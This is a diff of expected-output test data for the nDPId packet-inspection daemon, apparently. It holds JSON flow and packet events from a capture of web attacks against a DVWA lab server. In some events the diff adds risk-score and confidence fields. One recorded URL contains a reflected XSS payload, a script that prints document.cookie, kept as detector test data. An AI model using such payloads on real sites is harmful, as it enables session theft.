+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="}
@@ -176,7 +176,7 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"}
-01003{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="}
@@ -245,12 +245,12 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"}
-00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347068867,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347069146,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347069146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347069146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xkJAAD4G\/42sEAABwKgKMtAmAFBk4I1DAAAAAKACchBQLwAAAgQFtAQCCAoBOUsBAAAAAAEDAwc="}
@@ -304,12 +304,12 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
